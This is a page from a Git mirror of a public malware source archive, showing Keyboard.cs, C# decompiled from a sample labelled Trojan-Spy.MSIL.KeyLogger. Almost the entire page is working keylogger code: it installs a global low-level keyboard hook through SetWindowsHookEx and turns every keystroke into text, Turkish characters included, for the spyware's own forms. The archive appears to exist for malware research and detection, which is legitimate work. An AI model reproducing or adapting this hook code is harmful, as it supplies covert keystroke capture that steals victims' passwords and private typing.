daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
b5b08f64b9d82669889375d7c011c5b06a4ba76b
MalwareSourceCode/MSIL/Trojan-Spy/MSIL/K/Trojan-Spy.MSIL.KeyLogger.bxuq-09a3557d712ea2477a6d3c538dff55388670dd8d25105f75325129947182c50c/Keyboard.cs
T
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

378 lines
12 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: İnternet_Explororer_İncons.Keyboard
// Assembly: İnternet Explororer İncons, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 88E64AC3-71C5-4F41-9C01-5AA3C20B0433
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Spy.MSIL.KeyLogger.bxuq-09a3557d712ea2477a6d3c538dff55388670dd8d25105f75325129947182c50c.exe
using İnternet_Explororer_İncons.My;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace İnternet_Explororer_İncons
{
public class Keyboard
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private static int Key;
private static Keyboard.KDel KHD;
[DebuggerNonUserCode]
static Keyboard()
{
}
[DebuggerNonUserCode]
public Keyboard() => Keyboard.__ENCAddToList((object) this);
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
lock (Keyboard.__ENCList)
{
if (Keyboard.__ENCList.Count == Keyboard.__ENCList.Capacity)
{
int index1 = 0;
int num = checked (Keyboard.__ENCList.Count - 1);
int index2 = 0;
while (index2 <= num)
{
if (Keyboard.__ENCList[index2].IsAlive)
{
if (index2 != index1)
Keyboard.__ENCList[index1] = Keyboard.__ENCList[index2];
checked { ++index1; }
}
checked { ++index2; }
}
Keyboard.__ENCList.RemoveRange(index1, checked (Keyboard.__ENCList.Count - index1));
Keyboard.__ENCList.Capacity = Keyboard.__ENCList.Count;
}
Keyboard.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
}
}
[DllImport("user32", EntryPoint = "SetWindowsHookExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SetWindowsHookEx(
int Hook,
Keyboard.KDel KeyDelegate,
int HMod,
int ThreadId);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int CallNextHookEx(
int Hook,
int nCode,
int wParam,
ref Keyboard.KeyStructure lParam);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int UnhookWindowsHookEx(int Hook);
public static event Keyboard.DownEventHandler Down;
public static event Keyboard.UpEventHandler Up;
public void CreateHook()
{
Keyboard.KHD = new Keyboard.KDel(this.Proc);
Keyboard.Key = Keyboard.SetWindowsHookEx(13, Keyboard.KHD, Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]).ToInt32(), 0);
}
private int Proc(int Code, int wParam, ref Keyboard.KeyStructure lParam)
{
if (Code == 0)
{
switch (wParam)
{
case 256:
case 260:
Keyboard.DownEventHandler downEvent = Keyboard.DownEvent;
if (downEvent != null)
{
downEvent(this.Feed((Keys) lParam.Code));
break;
}
break;
case 257:
case 261:
Keyboard.UpEventHandler upEvent = Keyboard.UpEvent;
if (upEvent != null)
{
upEvent(this.Feed((Keys) lParam.Code));
break;
}
break;
}
}
return Keyboard.CallNextHookEx(Keyboard.Key, Code, wParam, ref lParam);
}
public void DiposeHook()
{
Keyboard.UnhookWindowsHookEx(Keyboard.Key);
// ISSUE: explicit finalizer call
this.Finalize();
}
private string Feed(Keys e)
{
switch (e)
{
case Keys.Back:
return MyProject.Forms.Form1.Label7.Text + " [SİL] " + MyProject.Forms.Form1.Label8.Text;
case Keys.Tab:
return MyProject.Forms.Form1.Label7.Text + " [TAB] " + MyProject.Forms.Form1.Label8.Text;
case Keys.Return:
return MyProject.Forms.Form1.Label7.Text + " [ENTER] " + MyProject.Forms.Form1.Label8.Text;
case Keys.Capital:
return MyProject.Forms.Form1.Label7.Text + " [CAPSLOOK] " + MyProject.Forms.Form1.Label8.Text;
case Keys.Escape:
return MyProject.Forms.Form1.Label7.Text + " [ESC] " + MyProject.Forms.Form1.Label8.Text;
case Keys.Space:
return " ";
case Keys.End:
return "";
case Keys.Home:
return "";
case Keys.Left:
return "";
case Keys.Up:
return "";
case Keys.Right:
return "";
case Keys.Down:
return "";
case Keys.Snapshot:
return "";
case Keys.D0:
case Keys.D1:
case Keys.D2:
case Keys.D3:
case Keys.D4:
case Keys.D5:
case Keys.D6:
case Keys.D7:
case Keys.D8:
case Keys.D9:
if ((Control.ModifierKeys & Keys.Shift) == Keys.None)
return e.ToString().Replace("D", (string) null);
string Left1 = e.ToString();
if (Operators.CompareString(Left1, "D1", false) == 0)
return "!";
if (Operators.CompareString(Left1, "D2", false) == 0)
return "@";
if (Operators.CompareString(Left1, "D3", false) == 0)
return "#";
if (Operators.CompareString(Left1, "D4", false) == 0)
return "$";
if (Operators.CompareString(Left1, "D5", false) == 0)
return "%";
if (Operators.CompareString(Left1, "D6", false) == 0)
return "^";
if (Operators.CompareString(Left1, "D7", false) == 0)
return "&";
if (Operators.CompareString(Left1, "D8", false) == 0)
return "*";
if (Operators.CompareString(Left1, "D9", false) == 0)
return "(";
if (Operators.CompareString(Left1, "D0", false) == 0)
return ")";
break;
case Keys.A:
case Keys.B:
case Keys.C:
case Keys.D:
case Keys.E:
case Keys.F:
case Keys.G:
case Keys.H:
case Keys.I:
case Keys.J:
case Keys.K:
case Keys.L:
case Keys.M:
case Keys.N:
case Keys.O:
case Keys.P:
case Keys.Q:
case Keys.R:
case Keys.S:
case Keys.T:
case Keys.U:
case Keys.V:
case Keys.W:
case Keys.X:
case Keys.Y:
case Keys.Z:
return Control.IsKeyLocked(Keys.Capital) | (Control.ModifierKeys & Keys.Shift) != Keys.None ? e.ToString() : e.ToString().ToLower();
case Keys.LWin:
return "";
case Keys.RWin:
return "";
case Keys.Apps:
return "";
case Keys.NumPad0:
case Keys.NumPad1:
case Keys.NumPad2:
case Keys.NumPad3:
case Keys.NumPad4:
case Keys.NumPad5:
case Keys.NumPad6:
case Keys.NumPad7:
case Keys.NumPad8:
case Keys.NumPad9:
return e.ToString().Replace("NumPad", (string) null);
case Keys.Multiply:
case Keys.Add:
case Keys.Separator:
case Keys.Subtract:
case Keys.Decimal:
case Keys.Divide:
string Left2 = e.ToString();
if (Operators.CompareString(Left2, "Divide", false) == 0)
return "/";
if (Operators.CompareString(Left2, "Multiply", false) == 0)
return "*";
if (Operators.CompareString(Left2, "Subtract", false) == 0)
return "-";
if (Operators.CompareString(Left2, "Add", false) == 0)
return "+";
if (Operators.CompareString(Left2, "Decimal", false) == 0)
return ".";
break;
case Keys.LShiftKey:
return "";
case Keys.RShiftKey:
return "";
case Keys.LControlKey:
return "";
case Keys.RControlKey:
return "";
case Keys.LMenu:
return "";
case Keys.RMenu:
return "";
case Keys.OemSemicolon:
case Keys.Oemplus:
case Keys.Oemcomma:
case Keys.OemMinus:
case Keys.OemPeriod:
case Keys.Oemtilde:
case Keys.A | Keys.F17:
case Keys.B | Keys.F17:
case Keys.C | Keys.F17:
case Keys.D | Keys.F17:
case Keys.E | Keys.F17:
case Keys.F | Keys.F17:
case Keys.G | Keys.F17:
case Keys.H | Keys.F17:
case Keys.I | Keys.F17:
case Keys.J | Keys.F17:
case Keys.K | Keys.F17:
case Keys.L | Keys.F17:
case Keys.M | Keys.F17:
case Keys.N | Keys.F17:
case Keys.O | Keys.F17:
case Keys.P | Keys.F17:
case Keys.Q | Keys.F17:
case Keys.R | Keys.F17:
case Keys.S | Keys.F17:
case Keys.T | Keys.F17:
case Keys.U | Keys.F17:
case Keys.V | Keys.F17:
case Keys.W | Keys.F17:
case Keys.X | Keys.F17:
case Keys.Y | Keys.F17:
case Keys.Z | Keys.F17:
case Keys.OemOpenBrackets:
case Keys.OemPipe:
case Keys.OemCloseBrackets:
case Keys.OemQuotes:
if ((Control.ModifierKeys & Keys.Shift) != Keys.None)
{
string Left3 = e.ToString();
if (Operators.CompareString(Left3, "OemMinus", false) == 0)
return "_";
if (Operators.CompareString(Left3, "Oemplus", false) == 0)
return "+";
if (Operators.CompareString(Left3, "OemOpenBrackets", false) == 0)
return "{";
if (Operators.CompareString(Left3, "Oem6", false) == 0)
return "}";
if (Operators.CompareString(Left3, "Oem5", false) == 0)
return "|";
if (Operators.CompareString(Left3, "Oem1", false) == 0)
return ":";
if (Operators.CompareString(Left3, "Oem7", false) == 0)
return "\"";
if (Operators.CompareString(Left3, "Oemcomma", false) == 0)
return ";";
if (Operators.CompareString(Left3, "OemPeriod", false) == 0)
return ":";
if (Operators.CompareString(Left3, "OemQuestion", false) == 0)
return "?";
if (Operators.CompareString(Left3, "Oemtilde", false) == 0)
return "~";
break;
}
string Left4 = e.ToString();
if (Operators.CompareString(Left4, "OemMinus", false) == 0)
return "-";
if (Operators.CompareString(Left4, "Oemplus", false) == 0)
return "=";
if (Operators.CompareString(Left4, "OemOpenBrackets", false) == 0)
return "ğ";
if (Operators.CompareString(Left4, "Oem6", false) == 0)
return "ü";
if (Operators.CompareString(Left4, "Oem5", false) == 0)
return "ç";
if (Operators.CompareString(Left4, "Oem4", false) == 0)
return "ğ";
if (Operators.CompareString(Left4, "Return", false) == 0)
return "[ENTER]";
if (Operators.CompareString(Left4, "Oem1", false) == 0)
return "ş";
if (Operators.CompareString(Left4, "Oem2", false) == 0)
return "ö";
if (Operators.CompareString(Left4, "Oem7", false) == 0)
return "i";
if (Operators.CompareString(Left4, "Oemcomma", false) == 0)
return ",";
if (Operators.CompareString(Left4, "OemPeriod", false) == 0)
return ".";
if (Operators.CompareString(Left4, "OemQuestion", false) == 0)
return "/";
if (Operators.CompareString(Left4, "Oemtilde", false) == 0)
return "`";
break;
case Keys.OemQuestion:
return "ö";
default:
return "[" + e.ToString() + "] ";
}
return (string) null;
}
private delegate int KDel(int nCode, int wParam, ref Keyboard.KeyStructure lParam);
public delegate void DownEventHandler(string Key);
public delegate void UpEventHandler(string Key);
private struct KeyStructure
{
public int Code;
public int ScanCode;
public int Flags;
public int Time;
public int ExtraInfo;
}
}
}
Reference in New Issue View Git Blame Copy Permalink